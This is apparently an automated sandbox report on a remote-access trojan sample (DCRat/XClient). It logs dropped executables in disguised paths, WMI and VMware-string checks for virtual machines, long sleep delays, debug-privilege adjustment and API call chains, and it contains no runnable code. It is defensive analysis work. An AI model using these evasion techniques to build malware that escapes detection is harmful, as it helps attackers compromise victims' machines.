Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1A6A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Memory allocated: F70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Memory allocated: 1A900000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Memory allocated: 1AEC0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Memory allocated: AC0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Memory allocated: 1A6A0000 memory reserve \| memory write watch
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Memory allocated: A00000 memory reserve \| memory write watch
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Memory allocated: 1A8C0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Window / User API: threadDelayed 2919	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Window / User API: threadDelayed 6843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Window / User API: threadDelayed 1134
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Window / User API: threadDelayed 1242
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Window / User API: threadDelayed 368
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Window / User API: threadDelayed 365
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Window / User API: threadDelayed 362

Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8528	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8532	Thread sleep count: 2919 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8532	Thread sleep count: 6843 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe TID: 7536	Thread sleep count: 1134 > 30
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe TID: 7540	Thread sleep count: 1242 > 30
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe TID: 7560	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe TID: 7608	Thread sleep count: 368 > 30
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe TID: 4476	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe TID: 8180	Thread sleep count: 365 > 30
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe TID: 7420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe TID: 7416	Thread sleep count: 362 > 30
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe TID: 7988	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C018647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7C018647C
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C019ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7C019ECE0
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01B3130 FindFirstFileExA,	0_2_00007FF7C01B3130
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	2_2_008DA5F4
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	2_2_008EB8E0

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Code function: 0_2_00007FF7C01A5134 VirtualQuery,GetSystemInfo,

0_2_00007FF7C01A5134

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Thread delayed: delay time: 922337203685477

Source: DCRatBuild.exe, 00000002.00000003.1710608400.0000000002B01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: DCRatBuild.exe, 00000002.00000003.1713100279.0000000002B01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yL
Source: ServerWeb.exe, 00000008.00000002.2233912155.000000001C81F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Result.exe, 00000001.00000002.1703441913.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: XClient.exe, 00000003.00000002.4194286088.000000001B690000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWwIns%SystemRoot%\system32\mswsock.dlltivityStateQuery activityName="*">

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

API call chain: ExitProcess graph end node

graph_2-23608

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Code function: 0_2_00007FF7C01A6940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7C01A6940

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 2_2_008F753D mov eax, dword ptr fs:[00000030h]

2_2_008F753D

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Code function: 0_2_00007FF7C01B41B0 GetProcessHeap,

0_2_00007FF7C01B41B0

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Process token adjusted: Debug
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01A6940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7C01A6940
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01A6B24 SetUnhandledExceptionFilter,	0_2_00007FF7C01A6B24
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01AAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7C01AAC68
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C01A5CE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7C01A5CE0
